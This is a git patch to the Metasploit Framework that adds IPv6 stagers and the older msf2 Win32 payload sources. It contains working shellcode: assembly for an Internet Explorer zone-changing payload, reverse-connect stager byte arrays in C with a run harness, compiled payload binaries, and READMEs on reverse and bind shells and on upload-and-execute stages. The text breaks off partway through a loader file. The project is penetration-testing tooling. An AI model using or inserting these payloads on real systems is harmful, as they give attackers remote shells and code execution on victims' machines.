From d53dd667018509bc31dfdfb5bd17a7e019de9a94 Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Fri, 22 Aug 2008 06:34:57 +0000
Subject: [PATCH] Adds initial support for IPv6, including two stager. Tested
 Meterpreter over IPv6 stages on XP and Vista. Using this is still tricky, I
 will add a wiki page tomorrow to explain the ScopeID stuff for link-local
 testing. This commit also includes the raw (oversized) assembler for the
 stagers as well as the entire old metasploit assembly set (useful for
 development).

git-svn-id: file:///home/svn/framework3/trunk@5635 4d416f70-5f16-0410-b530-b9f4589650da
---
 external/source/shellcode/windows/README      |  18 ++
 external/source/shellcode/windows/msf2/README |  53 ++++
 .../shellcode/windows/msf2/passivex.asm       | 176 ++++++++++++++
 .../windows/msf2/win32_reverse_read.bin       | Bin 0 -> 277 bytes
 .../windows/msf2/win32_reverse_read.c         |  28 +++
 .../windows/msf2/win32_reverse_read.elf       | Bin 0 -> 979 bytes
 .../windows/msf2/win32_reverse_read.exe       | Bin 0 -> 3072 bytes
 .../windows/msf2/win32_reverse_read_ipv6.bin  | Bin 0 -> 303 bytes
 .../windows/msf2/win32_reverse_read_ipv6.c    |  29 +++
 .../windows/msf2/win32_reverse_read_ipv6.elf  | Bin 0 -> 903 bytes
 .../windows/msf2/win32_reverse_read_ipv6.exe  | Bin 0 -> 3072 bytes
 .../windows/msf2/win32_stage_api.asm          |  86 +++++++
 .../windows/msf2/win32_stage_boot_bind.asm    |  33 +++
 .../msf2/win32_stage_boot_bind_inlineegg.asm  |  10 +
 .../msf2/win32_stage_boot_bind_read.asm       |  34 +++
 .../msf2/win32_stage_boot_bind_read.bin       | Bin 0 -> 301 bytes
 .../windows/msf2/win32_stage_boot_bind_read.c |  29 +++
 .../msf2/win32_stage_boot_bind_read.elf       | Bin 0 -> 1003 bytes
 .../msf2/win32_stage_boot_bind_read.exe       | Bin 0 -> 3072 bytes
 .../msf2/win32_stage_boot_bind_shell.asm      |  10 +
 .../windows/msf2/win32_stage_boot_reverse.asm |  37 +++
 .../win32_stage_boot_reverse_inlineegg.asm    |  10 +
 .../msf2/win32_stage_boot_reverse_read.asm    |  26 ++
 .../msf2/win32_stage_boot_reverse_read.bin    | Bin 0 -> 283 bytes
 .../msf2/win32_stage_boot_reverse_read.c      |  28 +++
 .../msf2/win32_stage_boot_reverse_read.elf    | Bin 0 -> 983 bytes
 .../msf2/win32_stage_boot_reverse_read.exe    | Bin 0 -> 3072 bytes
 .../msf2/win32_stage_boot_reverse_shell.asm   |  10 +
 .../win32_stage_boot_reverse_shell_revert.asm |  11 +
 .../msf2/win32_stage_boot_reverse_udp.asm     |  39 +++
 .../msf2/win32_stage_boot_winsock_bind.asm    |  77 ++++++
 .../msf2/win32_stage_boot_winsock_conn.asm    |  74 ++++++
 .../win32_stage_boot_winsock_conn_udp.asm     |  74 ++++++
 .../windows/msf2/win32_stage_inlineegg.asm    |  32 +++
 .../windows/msf2/win32_stage_revert.asm       |  19 ++
 .../windows/msf2/win32_stage_shell.asm        |  78 ++++++
 .../windows/msf2/win32_stage_uploadexec.asm   | 174 +++++++++++++
 .../windows/msf2/win32_stage_winexec.asm      |  34 +++
 .../windows/stager_bind_ipv6_tcp_nx.asm       | 230 ++++++++++++++++++
 lib/msf/core/handler/reverse_tcp.rb           |   6 +-
 lib/msf/core/payload.rb                       |  20 +-
 .../payloads/stagers/windows/bind_ipv6_tcp.rb |  75 ++++++
 .../stagers/windows/reverse_ipv6_tcp.rb       |  81 ++++++
 43 files changed, 1637 insertions(+), 4 deletions(-)
 create mode 100644 external/source/shellcode/windows/README
 create mode 100755 external/source/shellcode/windows/msf2/README
 create mode 100644 external/source/shellcode/windows/msf2/passivex.asm
 create mode 100644 external/source/shellcode/windows/msf2/win32_reverse_read.bin
 create mode 100644 external/source/shellcode/windows/msf2/win32_reverse_read.c
 create mode 100755 external/source/shellcode/windows/msf2/win32_reverse_read.elf
 create mode 100644 external/source/shellcode/windows/msf2/win32_reverse_read.exe
 create mode 100644 external/source/shellcode/windows/msf2/win32_reverse_read_ipv6.bin
 create mode 100644 external/source/shellcode/windows/msf2/win32_reverse_read_ipv6.c
 create mode 100755 external/source/shellcode/windows/msf2/win32_reverse_read_ipv6.elf
 create mode 100644 external/source/shellcode/windows/msf2/win32_reverse_read_ipv6.exe
 create mode 100644 external/source/shellcode/windows/msf2/win32_stage_api.asm
 create mode 100644 external/source/shellcode/windows/msf2/win32_stage_boot_bind.asm
 create mode 100644 external/source/shellcode/windows/msf2/win32_stage_boot_bind_inlineegg.asm
 create mode 100644 external/source/shellcode/windows/msf2/win32_stage_boot_bind_read.asm
 create mode 100644 external/source/shellcode/windows/msf2/win32_stage_boot_bind_read.bin
 create mode 100644 external/source/shellcode/windows/msf2/win32_stage_boot_bind_read.c
 create mode 100755 external/source/shellcode/windows/msf2/win32_stage_boot_bind_read.elf
 create mode 100644 external/source/shellcode/windows/msf2/win32_stage_boot_bind_read.exe
 create mode 100644 external/source/shellcode/windows/msf2/win32_stage_boot_bind_shell.asm
 create mode 100644 external/source/shellcode/windows/msf2/win32_stage_boot_reverse.asm
 create mode 100644 external/source/shellcode/windows/msf2/win32_stage_boot_reverse_inlineegg.asm
 create mode 100644 external/source/shellcode/windows/msf2/win32_stage_boot_reverse_read.asm
 create mode 100644 external/source/shellcode/windows/msf2/win32_stage_boot_reverse_read.bin
 create mode 100644 external/source/shellcode/windows/msf2/win32_stage_boot_reverse_read.c
 create mode 100755 external/source/shellcode/windows/msf2/win32_stage_boot_reverse_read.elf
 create mode 100644 external/source/shellcode/windows/msf2/win32_stage_boot_reverse_read.exe
 create mode 100644 external/source/shellcode/windows/msf2/win32_stage_boot_reverse_shell.asm
 create mode 100644 external/source/shellcode/windows/msf2/win32_stage_boot_reverse_shell_revert.asm
 create mode 100644 external/source/shellcode/windows/msf2/win32_stage_boot_reverse_udp.asm
 create mode 100644 external/source/shellcode/windows/msf2/win32_stage_boot_winsock_bind.asm
 create mode 100644 external/source/shellcode/windows/msf2/win32_stage_boot_winsock_conn.asm
 create mode 100644 external/source/shellcode/windows/msf2/win32_stage_boot_winsock_conn_udp.asm
 create mode 100644 external/source/shellcode/windows/msf2/win32_stage_inlineegg.asm
 create mode 100644 external/source/shellcode/windows/msf2/win32_stage_revert.asm
 create mode 100644 external/source/shellcode/windows/msf2/win32_stage_shell.asm
 create mode 100644 external/source/shellcode/windows/msf2/win32_stage_uploadexec.asm
 create mode 100644 external/source/shellcode/windows/msf2/win32_stage_winexec.asm
 create mode 100644 external/source/shellcode/windows/stager_bind_ipv6_tcp_nx.asm
 create mode 100644 modules/payloads/stagers/windows/bind_ipv6_tcp.rb
 create mode 100644 modules/payloads/stagers/windows/reverse_ipv6_tcp.rb

diff --git a/external/source/shellcode/windows/README b/external/source/shellcode/windows/README
new file mode 100644
index 0000000000..c5e14b3a67
--- /dev/null
+++ b/external/source/shellcode/windows/README
@@ -0,0 +1,18 @@
+This directory contains the win32 payload development environment used
+for creating the payloads in version 3 of the Metasploit Framework.
+
+The 'nasm' executable must be in your path to use the included build tool.
+
+The included 'build' script automatically creates a number of file types
+each time it used to compile a payload. These file types are:
+
+    - Native ELF executable
+    - Win32 PE executable
+    - Generated C source code
+    - Raw opcodes in ".bin" format
+
+The PE executable templates were developed by 'rix' and used with permission.
+
+To use this script, simply run ./build <name of payload>, where the name
+does not include the ".asm" suffix. To build win32_stage_api.asm, the 
+command line would be "./build win32_stage_api". 
diff --git a/external/source/shellcode/windows/msf2/README b/external/source/shellcode/windows/msf2/README
new file mode 100755
index 0000000000..904de7d4fd
--- /dev/null
+++ b/external/source/shellcode/windows/msf2/README
@@ -0,0 +1,53 @@
+This directory contains the win32 payload development environment used
+for creating the payloads in version 2.2 of the Metasploit Framework.
+
+The 'nasm' executable must be in your path to use the included build tool.
+
+The included 'build' script automatically creates a number of file types
+each time it used to compile a payload. These file types are:
+
+    - Native ELF executable
+    - Win32 PE executable
+    - Generated C source code
+    - Raw opcodes in ".bin" format
+
+The PE executable templates were developed by 'rix' and used with permission.
+
+To use this script, simply run ./build <name of payload>, where the name
+does not include the ".asm" suffix. To build win32_stage_api.asm, the 
+command line would be "./build win32_stage_api". 
+
+The Win32 payloads are somewhat modular, each component includes other
+components to create the final payload. The dependency tree for the
+reverse connect shell is:
+
+win32_stage_api.asm
+  win32_stage_boot_winsock_conn.asm
+    win32_stage_boot_reverse.asm
+      win32_stage_shell.asm
+
+
+This allows the different components to be maintained invidually, shared 
+among multiple payloads, and converted into multi-stage payloads almost
+instantly. This release includes the following last-stage payloads:
+
+win32_stage_shell.asm
+    Executes cmd.exe with in/out redirected to socket, this is used by
+    the reverse connect and bind stagers.
+    
+win32_stage_winexec.asm
+    This payload simply executes an arbitrary command line, it can be used to
+    accomplish things such as ftp/download/execute sequences, adding a user
+    accounts, or just signaling that the exploit was successful.
+    
+win32_stage_inlineegg.asm
+    Writes GetProcAddress/LoadLibaryA address to socket, then reads and execs 
+    the rest of the payload from the socket. This allows us to send InlineEgg
+    generated payloads as a last stage.
+
+win32_stage_uploadexec.asm
+    Reads a file size from socket, then opens up a hidden/system local file
+    (c:\metasploit.exe) and downloads the executable from the socket into this
+    file. Once the download is complete, it then executes this file with in/out
+    redirected to the socket. This can be extremely useful when combined with
+    a self-extracting/executing rootkit or language intepreter (perl.exe).
diff --git a/external/source/shellcode/windows/msf2/passivex.asm b/external/source/shellcode/windows/msf2/passivex.asm
new file mode 100644
index 0000000000..99103632dc
--- /dev/null
+++ b/external/source/shellcode/windows/msf2/passivex.asm
@@ -0,0 +1,176 @@
+BITS   32
+GLOBAL _start
+
+_start:
+	cld
+	call  get_find_function
+strings:
+	db    "Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3", 0x0
+reg_values:
+	db    "1004120012011001"
+url:
+	db    "C:\progra~1\intern~1\iexplore -new", 0x0
+
+get_find_function:
+	call startup
+find_function:
+	pushad
+	mov   ebp, [esp + 0x24]
+	mov   eax, [ebp + 0x3c]
+	mov   edi, [ebp + eax + 0x78]
+	add   edi, ebp
+	mov   ecx, [edi + 0x18]
+	mov   ebx, [edi + 0x20]
+	add   ebx, ebp
+find_function_loop:
+	jecxz find_function_finished
+	dec   ecx
+	mov   esi, [ebx + ecx * 4]
+	add   esi, ebp
+	compute_hash:
+	xor   eax, eax
+	cdq
+compute_hash_again:
+	lodsb
+	test  al, al
+	jz    compute_hash_finished
+	ror   edx, 0xd
+	add   edx, eax
+	jmp   compute_hash_again
+compute_hash_finished:         
+find_function_compare:           
+	cmp   edx, [esp + 0x28]
+	jnz   find_function_loop
+	mov   ebx, [edi + 0x24]
+	add   ebx, ebp
+	mov   cx, [ebx + 2 * ecx]
+	mov   ebx, [edi + 0x1c]
+	add   ebx, ebp
+	mov   eax, [ebx + 4 * ecx]
+	add   eax, ebp
+	mov   [esp + 0x1c], eax
+find_function_finished:
+	popad
+	retn 8
+
+startup:
+	pop   edi
+	pop   ebx
+find_kernel32:
+	xor   edx, edx
+	mov   eax, [fs:edx+0x30]
+	test  eax, eax
+	js    find_kernel32_9x
+find_kernel32_nt:
+	mov   eax, [eax + 0x0c]
+	mov   esi, [eax + 0x1c]
+	lodsd
+	mov   eax, [eax + 0x8]
+	jmp   short find_kernel32_finished
+find_kernel32_9x:
+	mov   eax, [eax + 0x34]
+	add   eax, byte 0x7c
+	mov   eax, [eax + 0x3c]
+find_kernel32_finished:
+
+	mov   ebp, esp
+find_kernel32_symbols:
+	push  0x73e2d87e ; ExitProcess
+	push  eax
+	push  0x16b3fe72 ; CreateProcessA
+	push  eax
+	push  0xec0e4e8e ; LoadLibraryA
+	push  eax
+	call  edi
+	xchg  eax, esi
+	call  edi
+	mov   [ebp], eax
+	call  edi
+	mov   [ebp + 0x4], eax
+
+load_advapi32:
+	push  edx
+	push  0x32336970
+	push  0x61766461
+	push  esp
+	call  esi
+
+resolve_advapi32_symbols:
+	push  0x02922ba9
+	push  eax
+	push  0x2d1c9add
+	push  eax
+	call  edi
+	mov   [ebp + 0x8], eax
+	call  edi
+	xchg  eax, edi
+ 
+	xchg  esi, ebx
+open_key:
+	push  esp
+	push  esi
+	push  0x80000001
+	call  edi
+	pop   ebx
+	add   esi, byte (reg_values - strings)
+
+	push  eax
+	mov   edi, esp
+set_values:
+	cmp   byte [esi], 'C'
+	jz    initialize_structs
+	push  eax
+	lodsd
+	push  eax
+	mov   eax, esp
+	push  byte 0x4
+	push  edi
+	push  byte 0x4
+	push  byte 0x0
+	push  eax
+	push  ebx
+	call  [ebp + 0x8]
+	jmp   set_values
+
+; This is NT specific, but it lets us execute iexplore regardless
+; of what drive it's installed on so long as it's on the same drive
+; as the WINDOWS directory, which it should always be.
+fixup_drive_letter:
+	mov   cl, byte [0x7ffe0030]
+	mov   byte [esi], cl
+
+initialize_structs:
+	push  byte 0x54
+	pop   ecx
+	sub   esp, ecx
+	mov   edi, esp
+	push  edi
+	rep   stosb
+	pop   edi
+	mov   byte [edi], 0x44
+	inc   byte [edi + 0x2c]
+	inc   byte [edi + 0x2d]
+
+; set lpDesktop to WinSta0\Default so that this works with non-interactive services
+	push  0x00746c75
+   push  0x61666544
+   push  0x5c306174
+	push  0x536e6957
+	mov   [edi + 8], esp
+
+execute_process:
+	lea   ebx, [edi + 0x44]
+	push  ebx
+	push  edi
+	push  eax
+	push  eax
+	push  byte 0x10
+	push  eax
+	push  eax
+	push  eax
+	push  esi
+	push  eax
+	call  [ebp]
+
+exit_process:
+	call  [ebp + 0x4]	
diff --git a/external/source/shellcode/windows/msf2/win32_reverse_read.bin b/external/source/shellcode/windows/msf2/win32_reverse_read.bin
new file mode 100644
index 0000000000000000000000000000000000000000..00f1106b13939eb47af8c12038dd7a0fbdef0d7d
GIT binary patch
literal 277
zcmaD6#=yW392yqhoueYr?P}8<!dk)js@qGVJ4%7^^<yK?Zj)}tcZUD}7#>(-@t}nL
z;CWug<F7wi*Qkh;KJ1QCVSJs|&Ewr2CByi-o28ra#cL+R1MzXO(T6w~;<5}PQ@SO)
zqj|ccWxA!iqd9^z`uzCb{J++DJUAod)cT44uQk45U}Rtj2oDSHeELEj=#&XS?lwt@
z=Sw6DUcULcD&Z#Q*R`kL{;>`ZHi|bkVu<ebmI(ZRz4LzO;oee_EY`@t;QuE5|3g_K
zJ6ZZ3ebQDB`EUL|RKxH<01!9;;r~#T&f^*N3=E7JObkkboe#4F0>l4@Dr7mtg&lmx
Z2E-g;Sq%R}c{&egF@yyJr6m4e1^_gubPoUk

literal 0
HcmV?d00001

diff --git a/external/source/shellcode/windows/msf2/win32_reverse_read.c b/external/source/shellcode/windows/msf2/win32_reverse_read.c
new file mode 100644
index 0000000000..95aeb8b65d
--- /dev/null
+++ b/external/source/shellcode/windows/msf2/win32_reverse_read.c
@@ -0,0 +1,28 @@
+
+char code[] =
+"\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c"
+"\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32"
+"\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07"
+"\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24"
+"\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8"
+"\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64"
+"\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e"
+"\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff\xd6\x81"
+"\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x1f\x00\x00\x00"
+"\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4\x19\x70\xe9\xec\xf9\xaa\x60"
+"\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32\x00\x5b"
+"\x8d\x4b\x18\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x05\x59"
+"\x51\x53\xff\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b\x27"
+"\x54\xff\x37\xff\x55\x28\x31\xc0\x50\x50\x50\x50\x40\x50\x40\x50"
+"\xff\x55\x24\x89\xc7\x68\x7f\x00\x00\x01\x68\x02\x00\x22\x11\x89"
+"\xe1\x6a\x10\x51\x57\xff\x55\x20\x6a\x40\x5e\x56\xc1\xe6\x06\x56"
+"\xc1\xe6\x08\x56\x6a\x00\xff\x55\x0c\x89\xc3\x6a\x00\x56\x53\x57"
+"\xff\x55\x18\xff\xd3";
+
+
+int main(int argc, char **argv)
+{
+  int (*funct)();
+  funct = (int (*)()) code;
+  (int)(*funct)();
+}
diff --git a/external/source/shellcode/windows/msf2/win32_reverse_read.elf b/external/source/shellcode/windows/msf2/win32_reverse_read.elf
new file mode 100755
index 0000000000000000000000000000000000000000..1c3db3899cb7571fefdaed92d58a56b1f0a33e49
GIT binary patch
literal 979
zcmah{&ubGw6n>j*+7zOskU~NWMhP@1gysj>QV;b|K`W(U^MfRqH8CsclEjkTU<9G{
zxD2iKKghw8D0-=QOzk0{2M<cclU7lqiJ}D$LScN9&EhtfzU9q(-}lYTo1J;9^OrAh
z90!J3zzPgC)_8k_krrKvfEQCg4E6OMi*o>d3l}iAG13XJHpWZ(s)5lDzz<MI!FB>?
z2=PRclzeV7e~!d#b?!U4<R)n^*ZCB>NFs#$8Kein=ELa^>hSifV_d7VKYQEfs_l`q
zkLz3~js=pQ;5vjST)SflHpT3f%yT<r<*8JGcu2-UG81H+Wb8t5WAS*G?rJTe7<=(}
zlkVQ>vfEfnCIszs`ve~49>S*{_t*QLm2cg@53ar&`Sa-IkAvBy5E8>7$gD58qx7xz
zUfWr(xnx@^D$vMX8s}3QzwvSZ%w&w7rE!0-xr8={AC3F8R&f=8D_Y>xsJ16Nqe&X~
z%5&Mo_Lm`adqM^pcW65@Bm|V)^fknal6O&3Z!Q-k?|DU$%K4I1^-cw5rUT&_fPiwV
ztmg6<)v6wgMy5)26$008l*>{@J?ipJ`Z(tJ>-he9Z!|EDF`{qy>^(b)qlxbI1-m!H
z3~dw%t3hIXgTiSOHs-O|Z^54W3&9i2Sg#GEvwmW=N6^jtH4uc6GtAh}z~;z$ongK6
z|0~u*m6>j?!0_R2w&JPGb$IwqUAUdGzY|q<k6W91Jtyju12};AnMsGza-~)mRjIsE
e%BfNyr<6fd)Lc~sQOqlfkxPY~ngda)6yP6f?YheV

literal 0
HcmV?d00001

diff --git a/external/source/shellcode/windows/msf2/win32_reverse_read.exe b/external/source/shellcode/windows/msf2/win32_reverse_read.exe
new file mode 100644
index 0000000000000000000000000000000000000000..31ef1697f149fdf8fdac40e8265eb330c858821e
GIT binary patch
literal 3072
zcmeZ`VqjorU|?VY;{X2{7<K?@5O4sK_=yIfG@tw~K87uvXBBra`kYk^$;d2LC@9KL
zFG|c+NKVYl%P&z#N>wN-%~QzCQ*iMQR>;jyN!8=!Qh}Kq;L5<@!^jHbg6Rhg%#7TO
zKqeCqgB&J+gcX2nkn2EVKzWcf2*7BD1Ox}99UDLq4`5)>z@~`CVtOU16(vABq(T0K
z`UT+$h~)_k3=i~*QW8rN85lsy7!-gQ<ajn9Mgk7N0MUaegQznAN`lmJASnVe9T*r6
z=p_{wgGE6G0tK*v29UZ;h=IW%1;8)@o5uy>Ab<l-6A)@fS%W(SUW5VN7aSTE-kqZ&
z(d}x}9l~0{_^R7WqB}}~@%3XP&u)`$#&?GQ{}>)vWAUJb{or|C#^bL)S=XqDls@c^
zQek|Z*3IMH9VNr~x|^k&@x^N<!vpbgvC)S(7~--FB2&60yQ6u!qh-3KyQ4XRGy44a
z-u%DTc|15H<kb3!|F1Q^0j1c0@UY;{r!VAzPMHAYZj+RFzC^O%<(r?Y5^i#SU3>cN
zAM5a7qj+N@hUi{ziNOEYJMVWM?kyF`VvP(8{%_L%Ka?f1lcn#`CvEkR|K|TgH4F~~
z0D%J#{ts2@Jf2Yx%s?4T3`&BX53>XU!~cgWWI4oz9el<H#2jH+4F5xUIuB<tgareo
zB>rFiFKQ6rFu3E5TCSTwErUkQ8ImC|8vjEw+NkDe4N%<<1pk4+4ahct@*$!K(gG@e
r>dKG(AklgT*NV)NfTH~5RA7U`+cn6~)yLRK&&9_Fp=Xpe_(K2yT&A)x

literal 0
HcmV?d00001

diff --git a/external/source/shellcode/windows/msf2/win32_reverse_read_ipv6.bin b/external/source/shellcode/windows/msf2/win32_reverse_read_ipv6.bin
new file mode 100644
index 0000000000000000000000000000000000000000..d47ff259085e96ef1e1423807fe5cbd618a7ff7d
GIT binary patch
literal 303
zcmaD6#=yW392yqhoueYr?P}8<!dk)js@qGVJ4%7^^<yK?Zj)}tcZUD}7#>(-@t}nL
z;CWug<F7wi*Qkh;KJ1QCVSJs|&Ewr2CByi-o28ra#cL+R1MzXO(T6w~;<5}PQ@SO)
zqj|ccWxA!iqd9^z`uzCb{J++DJUAod)cT44uQk45U}Rtj2oDSHeELEj=#&XS?lwt@
z=Sw6DUcULcD&Z#Q*R`kL{;>`ZHi|bkVu<ebmI(ZRz4LzO;oee_EY`@t;QuE5|3g_K
zJ6ZZ3ebQDB$zWn)VE7-ZVR#@QARvn^i!n?5f2d05@fR{c)5RJ7{|8bG{~ACf0|S$E
w^8bG`_M5Q**^yZ?f#Lr{6|x-S!VW%T17eP_ETBm|orkj+!h(TP68|p)02s4*P5=M^

literal 0
HcmV?d00001

diff --git a/external/source/shellcode/windows/msf2/win32_reverse_read_ipv6.c b/external/source/shellcode/windows/msf2/win32_reverse_read_ipv6.c
new file mode 100644
index 0000000000..991bb54e0d
--- /dev/null
+++ b/external/source/shellcode/windows/msf2/win32_reverse_read_ipv6.c
@@ -0,0 +1,29 @@
+
+char code[] =
+"\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c"
+"\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32"
+"\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07"
+"\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24"
+"\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8"
+"\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64"
+"\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e"
+"\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff\xd6\x81"
+"\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x1f\x00\x00\x00"
+"\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4\x19\x70\xe9\xec\xf9\xaa\x60"
+"\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32\x00\x5b"
+"\x8d\x4b\x18\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x05\x59"
+"\x51\x53\xff\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b\x27"
+"\x54\x68\x02\x02\x00\x00\xff\x55\x28\x31\xc0\x50\x50\x50\x6a\x06"
+"\x6a\x01\x6a\x17\xff\x55\x24\x89\xc7\xe8\x1c\x00\x00\x00\x17\x00"
+"\xff\xff\x00\x00\x00\x00\xfe\x80\x00\x00\x00\x00\x00\x00\x02\x1b"
+"\x63\xff\xfe\x98\xbf\x36\x06\x00\x00\x00\x59\x6a\x1c\x51\x57\xff"
+"\x55\x20\x6a\x40\x5e\x56\xc1\xe6\x06\x56\xc1\xe6\x08\x56\x6a\x00"
+"\xff\x55\x0c\x89\xc3\x6a\x00\x56\x53\x57\xff\x55\x18\xff\xd3";
+
+
+int main(int argc, char **argv)
+{
+  int (*funct)();
+  funct = (int (*)()) code;
+  (int)(*funct)();
+}
diff --git a/external/source/shellcode/windows/msf2/win32_reverse_read_ipv6.elf b/external/source/shellcode/windows/msf2/win32_reverse_read_ipv6.elf
new file mode 100755
index 0000000000000000000000000000000000000000..fd4f36196b67fdf9636482f3f051408cb4499940
GIT binary patch
literal 903
zcma)4&1(};5PzF&VhT|r1e%b55dsa0Yc>tlQV)8lpp}xa`5*~qvuRe+C5a`w!3cu!
zxIEglH~#=nqIlDzsXYYr;6bT)@>`>cf&~vk>2qF^t&1lI=FR-(H*em@%+2{r=NX1U
zhFFjlQB-KLjwslVV=9UQ5Dy{ym>=dt4gzgM4pkcsx`xdD(o2CWBvWZz33~AS8Jw^+
znQ!=_2WJCJ|3l;gj$-BqPj>mvz0+^C1DnqeGTr{p+>M~S@eXH$O#cdYF5s-6>0=f%
zy}pI-i22L8Ck~WX!kH5G;+zxb{Md(c4xzlZcxXVj^{!A(Jbkc1wr>sSYhvk?pnvKe
zfvc<oeCYLjx#L~=I{1CJ@Ot9c{b%2I=h8w%oQ|N}>VhXuUg>Z2t<{EGv1Q@{iMC0S
z&FJjf`<>%ciL%9l5J`skPAnEv><Xhyl4MZt_WV$N5)ne5zSp8FLKfc=*}MIC#twc)
z@yF978BosVQ=6adppKLRm7MyPf>Hud9`XVu%5q>))~+p=<iI&qm8->yTn~h~*;y_;
zb0QKBpW^v2j}WI`uWC{etX3b{vf*iRQ$yU+)oN9)X~S#$=i-Ar_#Wu-sQ(49Cuv|T
zMr)4(Hid`14;e`&?lAaPQ~VKZI%dK~4Qk<2_vIyk79cuL>{#j96QJgL2>{a&GsLK8
zV6&z3Oz~*C|1wrM*}RWMKZzS?Bi{uq{g?K}Xuk{isedpBc-_RK%5tsI6g9cJQjs*7
blhi5_RZXgENEC~zYWQ+V(j+9xwG#RRo&LV2

literal 0
HcmV?d00001

diff --git a/external/source/shellcode/windows/msf2/win32_reverse_read_ipv6.exe b/external/source/shellcode/windows/msf2/win32_reverse_read_ipv6.exe
new file mode 100644
index 0000000000000000000000000000000000000000..a55ffc721a003393b4ea31cebd230bc043e2e95c
GIT binary patch
literal 3072
zcmeZ`VqjorU|?VY;{X2{7<K?@5O4sK_=yIfG@tw~K87uvXBBra`kYk^$;d2LC@9KL
zFG|c+NKVYl%P&z#N>wN-%~QzCQ*iMQR>;jyN!8=!Qh}Kq;L5<@!^jHbg6Rhg%#7TO
zKqeCqgB&J+gcX2nkn2EVKzWcf2*7BD1Ox}99UDLq4`5)>z@~`CVtOU16(vABOhNvH
z`UT+$h~)_k3=i~*QW8rN85lsy7!-gQ<ajn9Mgk7N0MUaegQznAN`lmJASnVe9T*r6
z=p_{wgGE6G0tK*v29UZ;h=IW%1;8)@o5uy>Ab<l-6A)@fS%W(SUW5VN7aSTE-kqZ&
z(d}x}9l~0{_^R7WqB}}~@%3XP&u)`$#&?GQ{}>)vWAUJb{or|C#^bL)S=XqDls@c^
zQek|Z*3IMH9VNr~x|^k&@x^N<!vpbgvC)S(7~--FB2&60yQ6u!qh-3KyQ4XRGy44a
z-u%DTc|15H<kb3!|F1Q^0j1c0@UY;{r!VAzPMHAYZj+RFzC^O%<(r?Y5^i#SU3>cN
zAM5a7qj+N@hUi{ziNOEYJMVWM?kyF`VvP(8{%_L%Ka?f1lcn#`CvEkR3?^X8{~xMh
zcpxAkAd4-FF-!b^s7mMY7cxN8#ldA91H-=tAO{GTq?7;uo3Y;vl%XQCWCFwghbm+_
z#DyJv#s<V3VOc<vcsdVfF@yyJr6m4e{x50}-~iG&T)>3k;*n8*kQD->@lRH;4I51w
zpt>Ch{sVy<kZl0vLqrjz1yuahl^^>-qV)`}6`3UgMfu68zy^i4YmlF-kFk-Si;oXN
K&nRo~hX4Q^iMNRW

literal 0
HcmV?d00001

diff --git a/external/source/shellcode/windows/msf2/win32_stage_api.asm b/external/source/shellcode/windows/msf2/win32_stage_api.asm
new file mode 100644
index 0000000000..bea70bfe12
--- /dev/null
+++ b/external/source/shellcode/windows/msf2/win32_stage_api.asm
@@ -0,0 +1,86 @@
+;      Title:  Win32 API Loader
+;  Platforms:  Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
+;     Author:  hdm[at]metasploit.com
+
+[BITS 32]
+
+global _start
+_start:
+
+    call LKernel32Base
+
+LGetProcAddress:
+	push ebx
+	push ebp
+	push esi
+	push edi
+	mov ebp, [esp + 24]			
+	mov eax, [ebp + 0x3c]		
+	mov edx, [ebp + eax + 120]
+	add edx, ebp				
+	mov ecx, [edx + 24]			
+	mov ebx, [edx + 32]
+	add ebx, ebp
+
+LFnlp:
+	jecxz	LNtfnd
+	dec ecx
+	mov esi, [ebx + ecx * 4]
+	add esi, ebp				
+	xor edi, edi
+	cld
+
+LHshlp:
+	xor eax, eax
+	lodsb
+	cmp al, ah
+	je LFnd
+	ror edi, 13
+	add edi, eax
+	jmp short LHshlp
+
+LFnd:	
+	cmp edi, [esp + 20]
+	jnz LFnlp
+	mov ebx, [edx + 36]			
+	add ebx, ebp
+	mov cx, [ebx + 2 * ecx]		
+	mov ebx, [edx + 28]			
+	add ebx, ebp
+	mov eax, [ebx + 4 * ecx]	
+	add eax, ebp
+	jmp short LDone
+
+LNtfnd:
+	xor eax, eax
+
+LDone:
+	pop edi
+	pop esi
+	pop ebp
+	pop ebx
+	ret 8
+
+LKernel32Base:
+    pop esi
+    push byte 0x30
+    pop ecx
